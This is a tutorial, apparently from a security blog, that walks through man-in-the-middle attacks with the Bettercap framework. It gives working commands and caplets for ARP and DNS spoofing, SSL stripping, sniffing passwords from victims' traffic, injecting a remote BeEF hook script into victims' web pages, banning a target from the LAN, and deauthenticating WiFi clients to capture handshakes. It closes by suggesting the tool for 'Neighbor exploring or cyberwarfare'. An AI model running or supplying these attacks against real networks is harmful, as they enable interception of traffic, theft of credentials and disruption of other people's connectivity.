Bettercap Usage Examples (Overview, Custom setup, Caplets)

Introduction

We already talked about Bettercap – MITM Attack Framework, but we decided to separate examples from the general tool info. Here, we’ll go over some Bettercap Usage Examples. There is a lot to cover, and things might not work as expected depending on the situation and network architecture, but we’ll try to cover as much as we can, updating this post as time goes by.

Jump to:

• Transparent HTTP(S) Proxy
• DNS Spoofing
• ARP Spoofing
• DNS/ARP Spo0fing
• Password Sniffing
• Proxy JS Injection (XSS)
• Terminate Target Connectivity – Ban (LAN)
• MAC Changer
• WiFi Network Monitoring (Playground)
• BLE (Bluetooth Low Energy device discovery)

Transparent HTTP(S) Proxy

For HTTPS, enable http.proxy.sslstrip.We need to arp spoof victims address:

» set http.proxy.sslstrip true
» set net.sniff.verbose false
» set arp.spoof.targets 192.168.1.6
» arp.spoof on
» http.proxy on
» net.sniff on

Chrome will cause problems with HSTS preloaded sites, with message “Your connection is not private”. For non HSTS domains, it will allow you to proceed with “Proceed to <domain> (unsafe)” message. Internet Explorer will show similar message “There is a problem witt  the website’s security ceritificate”. We’ll fight with HSTS (Hijacking) and SSL sites some other time.

DNS Spoofing

We need to define which domains we’re going to spoof, and to which ip to redirect them:

» set dns.spoof.domains <domain1>,<domain2>,...
» set dns.spoof.address <Target address>

To spoof entire subnet, set:

» set dns.spoof.all true

Run it with:

» dns.spoof on

You should probably also arp.spoof the subnet or the target.

ARP Spoofing

As before adjust the module:

» arp.spoof off
» set arp.spoof.targets 192.168.1.6
» arp.spoof on

All traffic from/to 192.168.1.6 will be redirected to you (bettercap). That’s going to cause connection issues on the target.

DNS/ARP Spoofing

» get dns.spoof.*     
     dns.spoof.address: '192.168.1.3'
         dns.spoof.all: 'false'
     dns.spoof.domains: ': time.com'

» get dns.spoof.*
    arp.spoof.internal: 'true'
     arp.spoof.targets: '192.168.1.6'
   arp.spoof.whitelist: ''

One issue I experienced trying to spoof DNS/ARP are conflicts. By arp-ing the target and setting dns spoof, I was seeing nslookup returns conflicting data on the target side, as if my ARP poison and router argue with the target on who is right. I can clearly see address switching from second to second. Although on WiFi clients it seems to work, for targets on Ethernet (line):

C:\> nslookup time.com
Server: csp1.zte.com.cn
Address: 192.168.1.1

Non-authoritative answer:
Name: time.com
Addresses: 192.168.1.3 (Spoofed)
192.168.1.3 (Spoofed)

and in the next second:

C:\> nslookup time.com
Server: csp1.zte.com.cn
Address: 192.168.1.1

Non-authoritative answer:
Name: time.com
Addresses: 192.168.1.3 (Spoofed)
54.230.93.177 (RealIP)

When I try to load the page, one moment it fails to load, in the next moment it’s fully loaded. One thing that manged to solve it permanently is to use:

» arp.ban on

Password Sniffing

For the purpose of example we’ll check some requests from the localhost. Start bettercap (maybe in –debug mode) and set:

» set net.sniff.filter 'not arp' (default=not arp)
» set net.sniff.local true
» set net.sniff.regexp '.*password=.+'
» set net.sniff.verbose 'true'

You could setup an output file:

» set net.sniff.output ‘passwords.pcap’

so you can inspect packet dump later on with some tool like WireShark. Alternatively you can use some from the terminal:

$ tcpdump -qns 0 -X -r dump.pcap
$ tshark -r dump.pcap
$ tcpick -C -yP -r tcp_dump.pcap

By going to a domain and doing a couple of requests, we can see some captured traffic:

In the example above we have one form login and few GET password requests. GET requests are clearly visible inline. Form POST request visible in WireShark is also nicely formated within Bettercap:

192.168.1.0/24 > 192.168.1.3  » [16:41:38] [net.sniff.leak.http] http local POST 192.168.1.100/login.php Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/68.0.3440.106 Chrome/68.0.3440.106 Sa
fari/537.36  

 Method: POST 
 URL: /login.php 
 Headers: 
   Upgrade-Insecure-Requests => 1 
   Content-Type => application/x-www-form-urlencoded 
   Accept-Language => en-US,en;q=0.9 
   Cookie => PHPSESSID=2s7aaagjrj2ks7n3a8kflne5n2 
   Connection => keep-alive 
   Cache-Control => max-age=0 
   Origin => http://192.168.1.100 
   Accept => text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 
   Referer => http://192.168.1.100/login.php 
   Accept-Encoding => gzip, deflate 
   Content-Length => 38 
   User-Agent => Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/68.0.3440.106 Chrome/68.0.3440.106 Safari/537.36 
  
 Form: 

   password => theone 
   submit =>  
   username => admin

You could use predefined caplet http-req-dump.cap:

# targeting the whole subnet by default, to make it selective:
#
# sudo ./bettercap -caplet http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.10"

# to make it less verbose
# events.stream off

# discover a few hosts 
net.probe on
sleep 1
net.probe off

# uncomment to enable sniffing too
set net.sniff.verbose false
set net.sniff.local true
set net.sniff.filter tcp port 443
net.sniff on

# we'll use this proxy script to dump requests
set https.proxy.script http-req-dump.js
set http.proxy.script http-req-dump.js
clear

# go ^_^
http.proxy on
https.proxy on
arp.spoof on

Proxy JS Injection (XSS)

Within caplets repository we have beef-pasive.cap and beef-active.cap. I was unable to get any info with pasive one, but the active one works just fine. If we look at the caplet:

# targeting the whole subnet by default, to make it selective:
#
# sudo ./bettercap -caplet beef-active.cap -eval "set arp.spoof.targets 192.168.1.64"

# inject beef hook
set http.proxy.script beef-inject.js
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1

# make sure probing is off as it conflicts with arp spoofing
arp.spoof on

It sets the script, http proxy and it spoofs entire subnet. The beef-inject.js content:

function onLoad() {
  log( "BeefInject loaded." );
  log("targets: " + env('arp.spoof.targets'));
}

function onResponse(req, res) {
  if( res.ContentType.indexOf('text/html') == 0 ){
    var body = res.ReadBody();
    if( body.indexOf('</head>') != -1 ) {
 log( "BeefInject loaded." );
log("targets: " + env('arp.spoof.targets'));
      res.Body = body.replace( 
        '</head>', 
        '<script type="text/javascript" src="http://<YOUR_SERVER>:3000/hook.js"></script></head>' 
      ); 
    }
  }
}

It simply Logs the info in Bettercap console and injects the BeEF (The Browser Exploitation Framework Project) hook.  Although BeEF is a great tool, you can also create your own script. Alter the line and set your own script instead of the hook.js (src=”http://<YOUR_SERVER>/my_hook.js”>). For e.g. set the content:

alert("*** CyberPunk injected script ***");

and run bettercap with eval (targeting specific computer in my LAN):

$ bettercap -caplet beef-active.cap -eval "set arp.spoof.targets 192.168.1.6; arp.spoof on;" -debug

When user opens HTTP website, for instance time.com, hook will be executed and we’ll end up with:

XSS in the making.

Terminate Target Connectivity – Ban (LAN)

Start ARP spoofer in ban mode, meaning the target(s) connectivity will not work.

» set arp.spoof.targets <TARGET_IP>
» arp.ban on

MAC Changer

Before you continue, check your current interface:

$ ifconfig

wlx000e3b332e08: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500 
       ether e4:af:e5:e3:d6:35  txqueuelen 1000  (Ethernet)        RX packets 0  bytes 0 (0.0 B)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 0  bytes 0 (0.0 B)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

shut it down:

$ ifconfig <WLAN_INTERFACE> down

Then in bettercap, hit:

192.168.1.0/24 > 192.168.x.x  » mac.changer off 
192.168.1.0/24 > 192.168.x.x  » set mac.changer.iface wlx000e3b332e08 
192.168.1.0/24 > 192.168.x.x  » mac.changer on 
192.168.1.0/24 > 192.168.x.x  » [19:24:24] [sys.log] [inf] Interface mac address set to cc:88:45:f5:da:48

turn it on:

$ ifconfig <WLAN_INTERFACE> up

Now if you check ifconfig:

wlx000e3b332e08: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500 
       ether cc:88:45:f5:da:48  txqueuelen 1000  (Ethernet)        RX packets 0  bytes 0 (0.0 B)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 0  bytes 0 (0.0 B)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

WiFi Network Monitoring (Playground)

New wifi.recon covers both 2.4 Ghz and 5Ghz frequencies. It’s doing everything you need. Deauth, Sniff, Handshake captures. To start, add -iface option:

$ bettercap -iface wlan0

$ sudo ip link set wlan0 down
$ sudo iw wlan0 set monitor control
$ sudo ip link set wlan0 up

Turn on recon:

0.0.0.0/0 > 0.0.0.0 » wifi.recon on
[17:57:39] [sys.log] [inf] WiFi recon active with channel hopping.
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [sys.log] [inf] Channel hopper started.
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [wifi.ap.new] WiFi access point SNUPI (-49 dBm) detected as 94:53:30:a6:1b:63 (Hon Hai Precision Ind. Co.).
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [wifi.ap.new] WiFi access point UniFi (-49 dBm) detected as 96:53:30:a6:1a:64.
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [wifi.ap.new] WiFi access point Olos (-65 dBm) detected as ec:aa:a0:13:d1:4b (Pegatron).
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [wifi.ap.new] WiFi access point 58e699 (-71 dBm) detected as d8:97:ba:eb:e2:f0 (Pegatron).
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [wifi.ap.new] WiFi access point 566eef (-69 dBm) detected as d8:97:ba:ea:cf:af (Pegatron).
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [wifi.ap.new] WiFi access point UniFi (-73 dBm) detected as da:97:ba:ea:cf:a1.
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [wifi.ap.new] WiFi access point 506fd9 (-67 dBm) detected as d8:97:ba:37:35:16 (Pegatron).
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [wifi.ap.new] WiFi access point UniFi (-69 dBm) detected as da:97:ba:37:35:18.
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [wifi.ap.new] WiFi access point UniFi (-71 dBm) detected as da:97:ba:eb:e2:f2.
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [wifi.ap.new] WiFi access point ZTE_0D3585 (-67 dBm) detected as b0:c1:9e:0d:35:85.
...

You can manage channels with:

» wifi.recon.channel 10,11

To clear them:

» wifi.recon.channel clear

Results can be seen with:

» wifi.show

+----------+--------------------+------------------+-------------------+----------+----------+---------+---------+------------+
|  RSSI    |       BSSID        |      SSID        |    Encryption     | Channel  | Clients  |  Sent   | Recvd   | Last Seen  |
+----------+--------------------+------------------+-------------------+----------+----------+---------+---------+------------+
| -47 dBm  | 94:33:30:a6:2b:63  | SNUPI            | WPA2 (TKIP, PSK)  | 1        |          | 1.3 kB  |         | 18:02:14   |
| -59 dBm  | 7e:d5:07:70:33:65  | UniFi            | WPA2 (CCMP, MGT)  | 11       |          |         |         | 18:02:13   |
| -61 dBm  | 76:25:2a:33:54:65  | UniFi            | WPA2 (CCMP, MGT)  | 6        |          |         |         | 18:02:16   |
...
| -75 dBm  | 74:ba:3a:c7:66:e0  | TP-LINK_C776E0   | WPA2 (TKIP, PSK)  | 9        |          |         |         | 18:02:13   |
| -77 dBm  | 5c:37:76:6b:3d:af  | HH41V_4DAF       | WPA2 (TKIP, PSK)  | 8        |          |         |         | 18:02:16   |
| -79 dBm  | fc:2a:5e:d2:2c:c2  | ZTE_D24CC2       | WPA2 (CCMP, PSK)  | 13       |          |         |         | 18:02:14   |
+----------+--------------------+------------------+-------------------+----------+----------+---------+---------+------------+

To capture handshakes, we should define a sniffer, filter specific frames (0x888e), set the output file for processing later on, maybe select the channel and or target:

» set net.sniff.verbose true
» set net.sniff.filter ether proto 0x888e
» set net.sniff.output /root/wpa.pcap
» net.sniff on

» wifi.recon.channel 1
» wifi.recon on
» wifi.recon 94:33:30:a6:2b:63

Then we should hit it with the Deauth. You can deauth all clients with:

» wifi.deauth AP-BSSID

or just specific one:

» wifi.deauth CLIENT-BSSID

When you capture the handshake, you can start breaking them. We’ll not cover that here.

BLE (Bluetooth Low Energy device discovery)

The ble.recon will discovery every BLE device you want to inspect with ble.enum or playaround with ble.write.

To connect, enumerate and read characteristics from the BLE device 04:ff:de:ff:be:ff:

» ble.enum 04:ff:de:ff:be:ff

Write the bytes ff ff ff ff ff ff ff ff to the BLE device 04:ff:de:ff:be:ff on its characteristics with UUID 234afbd5e3b34536a3fe72f630d4278d:

»  ble.write 04:ff:de:ff:be:ff 234afbd5e3b34536a3fe72f630d4278d ffffffffffffffff

Issues:

• ble.enum only works one time per execution
• incomplete support for macOS
• not supported on Windows

Caplets

Bettercap caplets, or .cap files are a powerful way to script bettercap’s interactive sessions, think about them as the .rc files of Metasploit. Check this repository for available caplets and modules. Some of them we already mentioned above, other we’ll leave for you to play with. From the names below you can see what’s already available:

Conclusion

WiFi games, Redirection, Phishing, Sniffing, Injections, .. These Bettercap Usage Examples provide just a basic insight in how things work and what you can do, which is a lot (relatively). It can (and probably will) cause some headache while trying to do some specific attack, DNS issues, HSTS problems, SSLSplit issues, etc. Deal with it, explore. If nothing else, it will make you research things, understand how things work or don’t work. A tool you should maybe have in mind for some Pentesting, Neighbor exploring or cyberwarfare activities.